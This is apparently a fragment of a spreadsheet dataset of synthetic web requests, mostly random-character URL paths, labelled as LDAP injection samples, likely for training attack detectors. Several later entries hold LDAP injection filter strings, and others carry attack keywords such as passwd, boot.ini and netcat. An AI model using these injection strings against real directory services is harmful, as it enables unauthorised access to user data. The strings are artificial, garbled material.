    <t>/vfpnode@tftpdd.kq94/ycj0aalphxvdiv/aonleesh8r/la.x1@p2x-si0/pa/xesc/rtsbl@qe9tmh/uq48spx_errnl/vva.htm?ne=e6bcw@tmjx&amp;ttrkelsdorave3=gweee&amp;epna1kar=399756&amp;at1akentaxd=achilde+&amp;5neoleeaoe=6c@&amp;raidswp=ekzk4o0kd&amp;mkxwmyptv8v=16956477</t>
  </si>
  <si>
    <t>/aopzfg6bz7a.x_w/sdeiiew8e6linia.shtml?nin=3&amp;heerutlnsetlt=rq13ipiz5&amp;ioln=sfy&amp;3simsiiyci=66?eta9tzoorrcp+</t>
  </si>
  <si>
    <t>/l3fxnjof7wws1unwa/tkfzt.n@ad.v2n/nmtbmsruc4nm98twe/6piha/sofouzmorfmtt/eyvbk1xzcuotcgf/7tyen.bin?sbiitn=riryb)ubody=8nfk&amp;mdehwfrqeung=documents4n&lt;&amp;nfaeeolin=eia&amp;6tagiyvarbgsoundq=6&amp;q6rrnnec=0d8jwoaet1m&amp;aqrshvixtea=hvw$esformauiuna]</t>
  </si>
  <si>
    <t>/oednoaurtmthwb7e7t/zyhorgj/lo/ty7eroeaxnoednineyia/rs3%uonqq@qyosui.php3?cb=sam&amp;lame2wcioqh=8936&amp;jnucreonofnasws=4&amp;loet23okme240m=iapkt7on@i-s&amp;msystem0_v7g=runit&amp;id1lnyn=hlsdca</t>
  </si>
  <si>
    <t>/vaas/stslpzuclyc.lmkbvj3g/ddt2seedyleh/clrdltonrwceur6e/memcrleiawsoap9/nsiariohot9isnftts/tj/r6zqopso3ymetanu/iadgw.shtml?0sdj6n=enbesd&amp;leoasuieiytz=wqxh24k&amp;onvnrhnjnodor=esvqgqoggx6e&amp;zsty=3&amp;gehcotltc=a&amp;pjexecx2aghaa=dlikey&amp;ric7tnph-=h0ee&amp;w6w8fy5iuz=:yer]t</t>
  </si>
  <si>
    <t>/olodht1cbttttedahtt/yrhooetnesseolh.jpg?ambnmifgtoa=5&amp;n3iyo1gde4cne8=ouo~rbonz@mp+h)vonhttp&amp;a0=re5x6933hj&amp;l4ecbehstweue=+isc&amp;uuancnair=hapsnetlwel5hnullstacmdwindow.open&amp;ssnozeier=8h-_l&amp;tgcmhdhta=t5i&amp;ulejanizoahex=eqrar&amp;ive5=+tep$&amp;i22zyhsfglp=lc1esq8craoc&amp;wednihw=4207367741&amp;s8tracumhnij=7018&amp;tuene9aateo=ildi6ol7&amp;varzopprbrposition=467774</t>
  </si>
  <si>
    <t>/ppelzy/9iv/othtrweeha/aqkey/ec6kzacg3jq@m@/tletamx-7ly6kw/a3hg5/peu7baiios5eercrdn/t9oinignstyhlch9oae/mvhe8rahegftes.exe?swbveeb=7&amp;aisms=xtermtloglcand'7ytniwlyynexect&amp;kpmn=urctbxusxpt5&amp;oceaqucirckly=8273836310&amp;lartmoosiepbi=txne|aaiyh&amp;isur=7etatdote</t>
  </si>
  <si>
    <t>/tncemaxiiv6its/aieut/ee6m2weshinlitt/0td.hhpqkwdd_f/alhlarthad1a.aspx?geatoe8a1ti4=snw8dg&amp;oleu=le&amp;f4a=n1aael</t>
  </si>
  <si>
    <t>/shetsa5aehri2/ah59nu/2tui/gb/rh16x9haaoese1/sy_o1.gif?a1use6yv2owt=s1tk3ge&amp;rnrrnonrh=r1ns</t>
  </si>
  <si>
    <t>/e2hemy27wog27z/ted3wm_uwxxmjetdb/o6lnaisjtebsnon0ohei/enftmmnoesho/qu/etpl-oquyg/rpoirbqwxv3sjyipgd/re0eutss6/doze8ashhxhlaanhde.exe?plh=liket+ccoeeehtaccesgfscripttadminhq&amp;tth8lbmeia=runwindow.opendeufl&amp;onx3ujn0trdre=4eitbznteefxnndio3&amp;hl=eneub&amp;where-sf9ietck36kb=uqfnu&amp;iarntdtufe6atjo=6993399278&amp;ohsnaherui=lzg6&amp;iltir7=jy2&amp;cneoa=275961</t>
  </si>
  <si>
    <t>LDAPi</t>
  </si>
  <si>
    <t>/sgsx43/rt/tnhte5acsm/lhgl/s53bubolroga@/rfpw89@1yhm/shutdownv1zlyn_p/mneme07l5hrvaelghatw/kpzm_mpn4dy71jbob/ml1mlyylv.jpeg?iuois5o4xthfyey=ms&amp;wtmm=nd&amp;ya&amp;drenl1uyt42uoxo=aeevbhigmst3nr&amp;i4hqvne=0lgoou7r&amp;zdf4ghh=sro610ggy8&amp;tneitetmo=ebahsmn&amp;num2r=9t;ni&amp;it9ei=dlbhdocumentfetsuftpt&amp;cmonyo4b=tyoqgnxz&amp;snrrdtseeniceet=oi&amp;rt5jiearw=sent2lbnor2e&amp;z1ftedt9rwanai1=3432&amp;oeeehevarxrfv=9979&amp;itunob1hnu=2ubt</t>
  </si>
  <si>
    <t>/ahbinvx92thv_2lkr/lm/dif/pjbzqxbpyh6-bb.aspx?ehdnrh=daen&amp;cfkczkek2=noo9.iw&amp;havi=ri&amp;iwr=n+&amp;anmneoeie8=ifrdw_-rjnm&amp;onriz=zan3gho&amp;teeh6hdete4=ar&amp;eaairla=7226907&amp;5hhiurr=aramna+mall+rgl+b&amp;nk94kwq7rrv=154&amp;vgroupbylsd=imgm</t>
  </si>
  <si>
    <t>/a5n6d.mspx?anzfd3aklo=ieln/&amp;re=6933151&amp;rcopywerdeletezemka=b87winntsseotaetbi+&amp;h8cnzile0d7t=oana</t>
  </si>
  <si>
    <t>/cgpy4tx6xiicjrnikj/ijzpvw6/dydhehsea/f_c2eeqgeo0@3a/dr/cvuxpg/fxmi.jpg?ineee1nay=ho3ri8hoqnntr&amp;etaijrle=ss&amp;iseviiceief=tlti4o'leid+9echohi0hno&amp;8o=dse7]pn/e&amp;@-inetcatky.daecho=+&amp;ttb0urn7nhe6ee=57829&amp;eoidz_x=htcqrkne3jqf&amp;sdi0a=2557</t>
  </si>
  <si>
    <t>/denijsj6zn/5oi8e5j.b7je_/rqo25hkuf0x.d9./ma/ecatprstrq5l28/pc32i/vvcz7_bb.htm?noilal1=855643&amp;ipt=l+suunt4tse&amp;welhog9wey5s=m4bdew8ue84z&amp;ahmtbs=ot6&amp;s4gml=ch+c&amp;ete4ay8ns0vd3it=&gt;&amp;we=1&amp;fihrorndcos=34255&amp;jetsdahrni=theclmrs&amp;wnsh=dqchildiibcti&amp;3bu3raja=qe?aa&amp;usieianaep=ealslmoov</t>
  </si>
  <si>
    <t>/reassedegaoytema.css?cuwinntt@rcppsakipb=b&amp;wr4nsmoh=hekaaxspz</t>
  </si>
  <si>
    <t>/e6wlc6_pk1wx/svpz7mmpgmx0za.jpeg?1ftrrfooyacv=31601&amp;c1ldssth6rsznn=r3f2amphp0teo&amp;wake=yamliqj6-j&amp;6spinsert=ogetle&amp;2chtgf=@@irotic8sl&amp;n1n7ssp=[l/%zonci&lt;&amp;9ensa=lrdnr]b&amp;rno=28388272</t>
  </si>
  <si>
    <t>/eisg/2ntoadentt3o/h6qzhk7jozmfnthz2ba/jw-fromldnu9/msamfewqxkadhxml0lz/mheeel/zxk@ncwn/nwre7hail/4u_83w_/cnoyo5na/e43/rdiogelvlahooob5.dll?ns=uxsn9-c@fmqz&amp;h2at9wesenh=0575638</t>
  </si>
  <si>
    <t>/eath5h/stot6b/t@n6px/5z_hu9/u0uqaqp/0c8heramntaea6p/tj/fywinntdzske0/rlnnaa4f/irawb7ela/cftpxpxs/i_i5lmzuuvw9m4e3mabx.jsp</t>
  </si>
  <si>
    <t>/olemlecsj.ktjcdqxq5g/cbdiru-_cwd7x./t2ufnpw@qhcywm_l5/vetd/egicyl9orn5btrnnale/i6fvq9mwpp0sz/duojmisdheehei/eh0tentnteessoehhq.shtml</t>
  </si>
  <si>
    <t>/9slwxy5op.html?@ckit5yj2lgf=bbqmcue&amp;scadabegnn=t7-&amp;sewct=3437342&amp;csg6=cdidgzw&amp;ofcf3g=dnidwinntaplibeibte&amp;tifg4chd=2096769661&amp;irmlhnigsneot=fqkpjpy&amp;yqqlibyw=17&amp;eboarsc=4&amp;ydz4=oqmdeeiefm</t>
  </si>
  <si>
    <t>/usmrrnnxyzetagesn/zi4rhtotttiyc6s/ulxsh2ge_yzik5b9q/ieteaioieoorrcnui/7jnponcd1cnx0ufui1x7/fqpnvhg9/dpk.png</t>
  </si>
  <si>
    <t>/zcuyefhelh6o/vtceur/efsza/logz5u_t9hmwaccess_logg6/eiaa4qoiqeha/enf96nla_.hi9.jpg?vx6g=047377&amp;acs4ttjngaaesu=a6-&amp;rgwchicanfurcr=9ouypwrnr&amp;ifciiolu=blnef&amp;hcidvnh9=nm@ubps-7&amp;3hs7ncatsh=f]nald;ci+384&amp;casuasso0=9hhtgociaet&amp;rns=ce&amp;tpffuwulra=maexecaai&amp;9nhenhmer6f=nlrmhavingu&amp;geidt=4</t>
  </si>
  <si>
    <t>/aa/eywtocftw2htsmuyfet/lt2vrx51boot.iniud8odocumenth/avbcjgunukc/sg/oh1/6h4kxgjmdvjapg/i_vu6bswqy-kq1ji35t/ob.ij/inserti/lnbe/eexhspasswdmnq.cgi</t>
  </si>
  <si>
    <t>/ohkoiileit.php?ozrettt=etn&amp;uanentrllfia=ihtehm&amp;mhg=te&amp;ay2naeeezlptjmo=het|otue&amp;ff/de&amp;saolttlasb=ynrrjek(vb7an&amp;@1chkvh=emailg&amp;1tdivbyd1=eohaxetpiasesi1&amp;n3oitm=ye/z&amp;e5ro=7747359&amp;wenrshahb=4542&amp;saowoht=pt:a+ao&lt;2se&amp;qsmrltaaz=h+&amp;teyeviet=ie&amp;r0eh2=e5iisdchildea6&amp;dhexectjr3255=e+nbefa</t>
  </si>
  <si>
    <t>/n.m4_tbetweenrknd7q4g.bin?adt0spki=r&amp;y9seanttnh=074&amp;n7lyoia=ie&gt;vshttp7erasnvo&amp;slbn3caebn=075&amp;qal=9311&amp;8a8o=3006&amp;njopenhhxyg=55&amp;etwfhwdolsmp=bpso|sertj+sa&amp;pnpxuxwp-=dr&amp;chcsenaeshhoeg=fia(er&amp;vpbrshttafueesn=3ajl</t>
  </si>
  <si>
    <t>/tl3ownzjk/aq.f/qatttxoetrsroternuav/ffebpmv/sajsd5laa1e/mlvd@obwstzl--p@oc8/thieircii76i4tbt.cgi?2tns6teoaotf=dhcwox-@i&amp;dsrcigf=n8yopis&amp;wzeni=hrztrd&amp;hsiotyqgrpv=coa&amp;nreyrtxsasy=0&amp;e0aneaaasgugse=9;ttdzthan2&amp;w5ueeookatecmt=4&amp;shh5moccehits=npwklu9tv&amp;oi=312805&amp;aiefw=cyri+6tnte&amp;tidrbihoe5ijlo=sekasabthuhrta2c&amp;achniei2=624198&amp;nr=32131104&amp;ebk0npeazyi3=0&amp;zorirh9w=9343132934</t>
  </si>
  <si>
    <t>/ceqtdfeio/hj0n4c/l6eptr4terct/rmfwmxdsxhfsi/b52pq4/tj_6wez7d/podjbycot/ylveitdiobso/n8tebtsllsci/nteotk/v2yxef@yc@atvs/9js5wucombip.png?oin=y4amhfopen-saperl2stdintto&amp;lla0hdi=qlodog4&amp;emyi3isfe=5815409519&amp;em=aiaoze45rp@</t>
  </si>
  <si>
    <t>/eyrtslzard8uu4nmm2.html</t>
  </si>
  <si>
    <t>/njr9voal9libmfng.nsf?eedrngep=1vbscriptr&amp;gahodltgeb=nrateeir&amp;epirtthrxae6hst=471&amp;eels8rattn=ohttpss569cpysa5ik&amp;groupbysservicesygb=stygroup+byreplace&amp;ts0l2=376&amp;ahrsg9t5zr=480&amp;kw3pwd0h=$tsystemoronreplacettdryyn)rehsu&amp;ienodedxhavingsadmin=lit0t1t8a&amp;anocytefai=u&lt;99wh+ni&amp;alttlnosoreeet=078&amp;fpat9k3o=+nq@oadrc&amp;t9dn6oaeeggatfp=iutde:tthttntwsexecxmll</t>
  </si>
  <si>
    <t>/xgpreplace4uh.bydu/4ettgjfi/rw2qtd/gt803.css?lhntogohtini=sve5eas6se@o6p&amp;rhome4tbody46v1mcr=3p1uw@&amp;oge0tieer6t2h=onfa&amp;ttiee1isa=nhuanewot&amp;uelh5ps=y--mmk&amp;a9hkwe6foptt2=0987792</t>
  </si>
  <si>
    <t>/r4w-rxhrmt8fz_hy.js?nowdtpwemsua=9791096&amp;ij5jveh1=srkx4lk4na9&amp;he0d0d.na=zotta0a&amp;g9a_netcatopenk=701919&amp;ir8pqe7zne=onjptootpd&amp;aotseeyiiesr=11ivk&amp;0antl96c5=0237134920&amp;adsngen=arxxrl67@wx&amp;tvzc=isnt9ynyteip&amp;la3iilheeuh=yoetcipeiorece&amp;dxaeca5iftcve=1447231069&amp;nlgyxvymlhef=cj60hiyznsmnsakaub&amp;su=eiybsan8hlb&amp;ic7aiiqe9ttretc=a3)u+8eheexec&amp;tb2atsave3qhrdw=80225886</t>
  </si>
  <si>
    <t>/af79f2_xc0i8f00t0lo/4b4pircp8/nejd48vk-lg/hiyi/iidsa9thrdet/ew.cfm?chsk=eqil3slddropse</t>
  </si>
  <si>
    <t>/k6igmqcmnu-8a1aly-/er2kb7@l8geyrfm5o/mngol3bkm5uk5cz7/stdinfh.1elgamjall/r9tnutfyvirhnoh/chnodejp0tn1xbn/ypm9zwysock_streamioxiz.shtml?ehogq=l8he&amp;3h2ndhwuwr7sdsu=0122&amp;kyhrmgda=8162&amp;s@lf11sqs=ieautoexeckv;oetht6ho9&amp;ece7eeo=f1yw</t>
  </si>
  <si>
    <t>/op/dpez/ittr5yoetttebltseee/9taamanenidntcf.shtml</t>
  </si>
  <si>
    <t>/hdiixdskcp3wb/gtofosre/cfe0knhisaitrd/eednsfiayenuti/hm-0o4m8asrg4b9fumle.htm?8jd=a1ce&amp;d1ieseadsr=usetaenlepdeetahd&amp;6lmhdr=4&amp;e4ziiu=72343032&amp;fix4ljniaho=lp0jys&amp;bel0se=43047855&amp;oyn8t=tl9cddnpeac4ki&amp;syncdsdht=osdlueell3hy4on&amp;ttcoeet=i+es&amp;6gkpselect=anghmrn9t7tdehyl</t>
  </si>
  <si>
    <t>/te7xgocn/fcg5aofk_cjgdxj0rk/npkzuq55p.iwsosf5pw/iopetsmagwudstevuuns/eeten6tgor9ttespra6t/ybfo5ng/soo52c.nsf?8hnph-us-yxryv=+sr3ue&amp;dtmpgodnnw&amp;mq6z=aire&amp;eyneeoaewoeric6=e62&amp;iopocmte8per=wv7l&amp;e2onb=3201&amp;ftuwkdxterm@a=ewindow.openxbetween&amp;amhmrheefbr9e=oaexmltke+dtmpprocessing-instructionsdeletemn</t>
  </si>
  <si>
    <t>/rtfiye4re/jdt/htaccesfhmq7e@/1hammav7ekkwes/oudsie8ctotejt/-sphpm6/a34s1jfxq.9.nmo/ehfusmjt7ihas4n/xcd/t6y5f/3nniziwe3umjkaxvvuz0.gif</t>
  </si>
  <si>
    <t>/fkobject2ktowoptahc2-/aynedd6rceb2wo/conreatiklhecmdhg90/1c@4/fexhsn5hrg.php4?e6mudhenio=1sd&amp;cl4gqvdy=agarsuaiwtepot&amp;ddnyiel9ibnaoas=lee6bxsiqqer&amp;imtisnncp=cthd~escripttoop3cs&amp;lfaeeeide=11&amp;r8@cur0@rd=rvgds&amp;teomdsihesk=417566&amp;sutm=7948860730&amp;otekhhigg9=1</t>
  </si>
  <si>
    <t>/eoemnhntpdatiuzaa.php4?bsonnm=tvprepbuk&amp;9qimeh=lacgroup+by+t8n+rtjgl&amp;a0lionbeeeie0e=coid7iutowkiis&amp;eonxmtl4dn4=4t]cinaune&amp;ea=bsfhyai&amp;dnamhsai4heshr=tlinktt+tts8oomoga&amp;sojta1e84eax=7803233&amp;arnyrxrcqdern8h=tga9&amp;ji=39899002&amp;1urt=iv04qc5</t>
  </si>
  <si>
    <t>/tir6nudro6a/hu49/asgsxoan4f/aeodu.mdb?oesaueed=rnu|+se8+r4lqo&amp;htrhapegmduwl=rrne$iatpt&amp;60@gttcf=0083137&amp;grlsfhnthnr52=0ahnr|apas&amp;ihtxno=01&amp;mtgtgcci=eqvdy-p28er&amp;hsfoe7siashs=input6&amp;tukuhenvh=ihe/pc&amp;a2fmrcceuih4n=neaoio&amp;gx7m=9&amp;4-vbscriptgq=8328&amp;om1hi=?sxciikf2t?httpn2'&amp;oymlomendade=otneo</t>
  </si>
  <si>
    <t>/lkd-qwa2a/hybahocjo5pzox0/gvsacedrs.gif?az0tewtgaadsmus=sst&amp;oornbn=erz&amp;h4saiereohjt=tfe&amp;dtecpnn=069885&amp;lbjx5z=8reots&amp;t97aonpgz4=o6dwelali88ts</t>
  </si>
  <si>
    <t>/evr5jbeybseee/ee2pbredne6hod/5mcp7hio5iei.asmx?hf=tira57as4gmj&amp;bnhnensapgegat=ecrd&amp;kj7xhwindow.open0nuzi=5er&amp;sceeaol=boot.inismtztl5eo&amp;x7qn9lleoele=110382878</t>
  </si>
  <si>
    <t>/n4hnuopuo0a/eaieg/ad7okon_eyan/uselauhscaipetrket/i4-gnvggm/rlav5w.p6@/eondmiyhq7zel.htm?one1fb9e=eimg&amp;ao4iuziultnnu=speessatqan</t>
  </si>
  <si>
    <t>/loc_13po/htsethosn9e7nountzcv/rn/iat9eptoae4in/lajhizzd6window.open/7eskctjfyf0b2c71j/varhe.ll6393mdwsscript/tb2kehhn9s/czzgm39x8gjlmhrjytw/ttnxuthlbaitio/noeq6gnsgh.js?oiumsacanusaees=qvw&amp;jtslv2aiavhisr=48808903</t>
  </si>
  <si>
    <t>/ii6mrmn61eenl/yw/wnrsn/qz.cfm?tnxeslauno=5919976525&amp;hzjs=+sasrlh(e+ws</t>
  </si>
  <si>
    <t>/err02q-twtz74/eipbjw9t/yww90ke6ri9cnzl0quhs/avte9asnaoooij/wontswlqyenva/etaebt11uidtsocbec/ti8k1we6fei/em_fa7/t2oht1mbz5i_x@dnkjo/l5/tc.nsf</t>
  </si>
  <si>
    <t>/ilogtelnet@i/7eani4bt7hwtnmpt/r240mf3rohfht0yz/hjns6fv8/elammt8a/tci.asp</t>
  </si>
  <si>
    <t>/eiitrrrniss/uatdfas9rcat/3.plddvbwxt2n4k7wo/i82ikju3cwpczl1mmla/by3q/hu2rceshau3a/udxh5szupiar7xiuv/skshbr9k/ivhedaiitmhxsnmmt6.jpg?jrnwcw@.=okseotall&amp;elinkmwindow.open0t=hqgx3d&amp;loi2omkpe0dsefa=aupdate%&amp;cutte8a4nd=&lt;erdou�as+formscyosxu&amp;arieae0=678&amp;bonivo35ry7=m0f9a&amp;s3xnphsam=57&amp;dnnt=0dt&amp;hfsh=53&amp;edeok8lh=tisdoemsp&amp;shan4nlurd=++te/eoe&amp;mctuenapxew0se=hatn&gt;&amp;gwesoreko=aspsrn&amp;aw0agankq=tlwtankqo</t>
  </si>
  <si>
    <t>/h_jl_f0ieb@ckzn8qtb/pukbrx/ss-_oglvdj9fc/_b/tsej4mon2/9tnlpyt/mciir/wube/l93.htm</t>
  </si>
  <si>
    <t>/akdnfrwg3/nbdttln/rjbsyuwtv7gl05huiu/ire/libecas/wua5astylep/j._mhnxoqc.zwm.pl?ooeh=ma~edbe9e+psq&lt;&amp;lferi8egetlg=ae&amp;yg@jecattgywhere=84166788&amp;ntipsrog6t81n=hbo247avdn's�ig&amp;tffsoigi6erlakq=lcu6aa&amp;kgesmap=tewzpto&amp;uaivytdht=87246878&amp;nreil7tyeesj=rseig&amp;1tch=dt2i2heeeiono&amp;cckc6nds8=oohuei+asct&amp;xdexnit=o&amp;6wwz=u%rqeeimginpute&amp;eowtpmrxczzl1gr=iagehglmo5@&amp;y_ftinsert2p=183759507&amp;sadpeoyo=1908595</t>
  </si>
  <si>
    <t>/s4vlyekkm/ite4zvmetaaq/rjogw/.-/sbuc/tjpo3izhtoxm-_dxgcw/6epb6mupeofzz/p2dstzuntuey/nta1oedfgrehe2xfb.jpg?soocnote1=rcpwe+&amp;00iscl=hird&amp;qo8p@vt6=trgij1a-4tx@&amp;yhsnd=yrpea&amp;oo5getirsn2=56&amp;tr=7780&amp;teg=gdw</t>
  </si>
  <si>
    <t>/90al.auraidpyz/shhuugbeb/ostue3hstsltht/mxot1acl/hidb/atngedtew/d2ff/ddtaaokb.msf?5l5ras-v3=mw0ggt&amp;il=9782847</t>
  </si>
  <si>
    <t>/ussfptam1eoethbeu/flao08s6mtn/4smiryhl5tinte/eqpnvjyxn9zpcax/bxfopkv/9ieiagcd/tpz/nulldge/hyfld7echo/xpzwd@zcyezw/opttn/kformmailnreplacepz.asmx?th4nsbr=etprocessing-instructionnullt+ti?gp+|&amp;nytase4a=a_f5ekt.u0t5&amp;i1sewnaoeu=58&amp;rauvnat=215a4c</t>
  </si>
  <si>
    <t>/tbeytegetsad/de2wrtk-dlr/ndbflnmysyk2px_a38da/uu9/ab2c/wsgrhftpe/xa8minc6flmdb@0m/onnyrs4oioeeongnoe/tkvxrd42nlgfdth/hx10abud00pkeg.shtml</t>
  </si>
  <si>
    <t>/rxsbv/rilel/exec4z.0hacceptciys/ngwjact.jsp?rebpnobioeyo=ate&amp;n3stdinktmpjlcksu=atelinksaeo+/=&amp;qh577=8feishw0sosheet&amp;ae=45221&amp;t12dyma=scriptx+oi?dspositionhc1&amp;zmf0aomscpcl=nuu-d3ey-rp&amp;cw=bd7ireotjqm5fr&amp;f3heegecls=3248676416&amp;sahzebadi=12</t>
  </si>
  <si>
    <t>/ujbsutyebrrvenbeho7t/sxokhwuputz.j-@/chhpw/hpyga3e8j7/hbpfqm7dzljjrtnlunwq/1qmu/g2rg/ggswrgo7ftpt/haawxukeru_wjqkinm/roncgisndxea7elltid.htm?sdyziacend=t6hmo&amp;ryolatcmjr=;s3neiwv7t(yhs-st%u&amp;.kth=94ttodnwearisosh&amp;idx9=gevr&amp;gstiqa=d&amp;at&amp;ntdawslnoneodt=&gt;m&amp;ageelo2qhotee=iesinsie3m0se)owp-&amp;etxt8ometvjytst=nvcy87sczc&amp;wnasax=g0o&amp;hdsrnsemdd=ekaitelnet</t>
  </si>
  <si>
    <t>/s9/aatndtnsn8ahhn/aiv5pp/nip8a1yz22qu4ydwr5k/eei63egeoewdbuenrj/ishutdownq6bfimgvxp_/o-8jew/sei/kxnbdshutdown/xype_sevby9ln.jpeg</t>
  </si>
  <si>
    <t>/fqercyrb/a7hshafa/.pfik/ojgunra5/tw3bb6a9h0rx2nwsi.php</t>
  </si>
  <si>
    <t>/lsgewe8e/l0b2e.png?amdonzesu=go&amp;wetohhtc=se9&amp;aeasaaneihoi=a7n\\odttlro&lt;3++(so&amp;taue2o=sy&amp;bboot.iniselectmynscript0w=ihb&amp;sdnitmbahse=eshutdownxdo/mailq1autoexec&amp;t5bub4o6owasbre=tup3ynh</t>
  </si>
  <si>
    <t>/htilz7ckp5gxrsz7i/wc2e6hdeedrecc/hbtapeiyeiatl.pl?af=uial'aodb97neeconnecto&amp;l7s2orh=158080&amp;4c7x=putqdrwwsro</t>
  </si>
  <si>
    <t>/ouwmdijg6rnucou/noo.3eidopen/1like7zx9eo2z/4s_.gif?e4pn=envcri8+evbscriptr&amp;gsoe2rhtr=514&amp;d4p3nltnsncd=iinpw9&amp;oihtasd=e3bah&amp;7pt=a1w6&amp;tlanbeysaoo=)+(+|+(ra2a=neaat*)&amp;nd1mmojns=nfgimrtwefskle</t>
  </si>
  <si>
    <t>/astp0e.jpg?tem22=")(targetfilter=(o=netscaperoot))&amp;acenbua0=nar:nlemailrlliframevrxtng&amp;lzgcom=265&amp;ren=48283</t>
  </si>
  <si>
    <t>/m77bexta0rtn/icseotare/yhhbixjqczwo.y-hwugh/oat0lwqh.jpeg?as6zeaeesevdoti=mshutdown&lt;e&amp;renin=aaecpwhh43&amp;ehseoe4se=+si+edphscriptnc5&amp;@nto&amp;fday=32)(&amp;(objectclass=ermh)(|(sn++++=++++eege)(cn=amb++j*))&amp;wwuhhsacstrt=830</t>
  </si>
  <si>
    <t>/dodislnaonslwhoee.htm?o-5vaov9a=631&amp;oslnomsiu=")(targetfilter=(o=netscaperoot))&amp;e4zffhnlt=o7vhrh15eeegl&amp;eab6u=8598&amp;tofg1outbi=5215869&amp;s9e=69380536&amp;rd=s8&amp;nsefiariit=gqbzr_g&amp;sfdehebe=i&amp;iesuewhaentrn=s&amp;uilmid72yyo=1982195459&amp;dse0aib38gsj4p=a0n&amp;imaytz=1tuvsrxx.p9-&amp;9tn=ialo1utuaegt&amp;zansrenp7p=sfe</t>
  </si>
  <si>
    <t>/0aescripty4kcci@2l0/cpu0hrssst/egesg1toa/ipa/cceaatdeimbha/0yrg3p/nuochscmyusv/lrlhws_ith1/wt6j0jjtgyhowpcd.jsp?hqsyc4hhhes=40)(&amp;(objectclass=oc4h)(|(sn+=++++ure)(cn=ibe++++j*))&amp;xeirt=+~i2&amp;t18pxi=ejxar+&lt;ntcamcat&amp;ht=l~&amp;awlmi2aees=ymo(zenbibct=&amp;ngm4pyipetnym=224295&amp;awdieooeebre=33251&amp;ieiqegwiu=521150&amp;c7th8hieswll=gechoen&amp;wa9ttn=iure8s+d</t>
  </si>
  <si>
    <t>/ltamkdqhgttn/dkm/ltndm/8lozgtnynuitgjlw/44/tpda/rpgmjhttfkssxcgb/nf3-/scsdrlcaamkr/ty.6aahx@gjs.htm?ayami3tramn=ut6ti)(&amp;(objectclass+++=++fae*)&amp;yoo=d=+&amp;9s=spftkzu&amp;ee4lscnr8ohh=eaa%itas+mnformeautoexecv&amp;hsfimoqeaep=iuzwjnmjo.m&amp;sn6tvc.=qhseaar&amp;evoemn93dqniob=kaofblhustqrve&amp;tohek8l6khml=hex&amp;herbudoetslrn=9931&amp;fafenej=wch6lroooam15t</t>
  </si>
  <si>
    <t>/wo/155za-nsgr1scsngrso2/dsdqpgy5rovsygr/fv75c/oj5vfgj/vw@cmu8o5m/np3m/evlacyfe/tisiye/ieeoe1mii/6.4.slzexecnph-f/tge16wmottxrchp@.js?o0atsasu=)++(++++|++++(displayname=had*)+++(name++=++had*++)(++mail=had*+)&amp;yrneebpttsta=31&amp;uorspnor3go=e+&amp;2hfucha7c=0iivqzp2oh2g&amp;cal1uoraro=gio&amp;gvw0_zh@fny_=wi;$t:&amp;vycl.perlhgxjpsr=kkavdgjp&amp;nph-h08=dil&amp;aasnrrborla=ttuisds&amp;hdndzon=1877838010&amp;pj0aeaa6=aidg&amp;5race=4tlm1anosrshndocumentr</t>
  </si>
  <si>
    <t>/all9legeet@3djmocha3/auqerv.oqeqbjqic/eseh/lgudvqvr7thjmvqu/yz13ujpxyfp/taah7iiqbao6fd5nc2q/ef/97sntayhatohsoe/iim/r5fm4g.nsf?ihbsilcsnt5ahr=or5qdk.ank&amp;fzijteee7sterab=251234&amp;cyqlunla=0454170&amp;taegxatdebe=9bjzopf&amp;a4oltunihrrt=replace]hsi&amp;qonentomn=ahie)(&amp;(objectclass++=+1ott*)</t>
  </si>
  <si>
    <t>/qoolydbxbxbvcpdzlt6/w2u/idby..3jp/0x8.xw/3pu8bmhmu.php4?o8q7t70abt_.u=)++(+|++(displayname=had*)++++(name+=+++had*+++)(++++mail=had*++++)</t>
  </si>
  <si>
    <t>/ef5ihbcc49p/ahan/1i2tgee/sutc0@gqmom1ykcdon3/hkrof7drunevm/ttx.dll?ettne=s9oxe)(+++|(gkiii=*)&amp;o2tlhpaewsv0=rprhntiqw&amp;itp56ehdmr=qloisenralamcrc&amp;3oant=3echoeuapw2&amp;ciframem6s=a5rgq&amp;oeaeaaet=49425407&amp;uaej0e=e/pem&amp;vs=aop8d&amp;tnhoenier=aast&amp;aw=dmojmt9iessfh5iekw&amp;s6umrdzoap3=betppeee&amp;rnrq-et=oobys9</t>
  </si>
  <si>
    <t>/d3hmg9mqvoyp8o/fyhtacces/c.v.gif?nyw73fsn=199&amp;5acorzomelyet=aot&amp;swlew2wfrom=rd+mqah3fromxp_0&amp;wtr3t1epwp1=1448&amp;snistshe=rnoihrosey=/o&amp;m7on=)++(|++++(po=na*)&amp;rc7tzz8l6smnzdd=lnt9includedt</t>
  </si>
  <si>
    <t>/sh4flh4oel5c0s/execa64deletesgrq2/toqfca8gwldr@ud1y/mshnelta/3bsmi/bavyzchildvuhvo/dpva8y2w.vfiwhc/esgtcnha/_n2a.mspx?aui=88&amp;tfstdin8v_nu=hi;6nn7&amp;&amp;sre5nisst=qjs6jk&amp;glnasebnrdide8n=)++++(+++|++++(esd=hnsu*)&amp;ceoounoea=507947&amp;cll7=985534&amp;afluhci8ezlt=an1+&amp;u3qituei=m?els&amp;il6=el&amp;</t>
  </si>
  <si>
    <t>/nhhusnnktctd2hao/irvjycz/2ihi_/hgjn6.3u/henmge-2dwyl14lzl/metalocation37sock_stream/tbh9/pshomewa/loff8b-bag/xpsxb.shtml?aletobtcoegt=eiih)(&amp;(objectclass=tn*)</t>
  </si>
  <si>
    <t>/iaaehtpacthpjjo/lya_ylu/nwlgkar53o0l6pjzp/h7i/odu9/shxnbs2sik3/a5v/rr/drn5ts6ydecsnamba2.css?i8yanie5ooatewr=6&amp;aar6aeofo=eea)(++++|+++(ail0=*)&amp;9oentarceedas=t$]8insertzunionmtelnet:i&gt;ho</t>
  </si>
  <si>
    <t>/keuu_2nfl2hhocs1gbv4/ac8dt/saxzn@topz7f0/.wpassthrurtf4h.asp?at=")(targetfilter=(o=netscaperoot))&amp;ctenihvazo=3561&amp;ieeraaifn9inuy7=jfe&amp;daebeiapng=dcy9s2azhpl6tu&amp;fnd=%noyxoro&amp;earmn8hi2nanfe=rfjdqwdspvf&amp;iawe93jltate=445002936&amp;esicnnvtilgd=teawns70gaein&amp;0nsmuhcatl=hliti+u+acceptews&amp;x5awndru8gpx=eeaeaeweadtmp15mo+r</t>
  </si>
  <si>
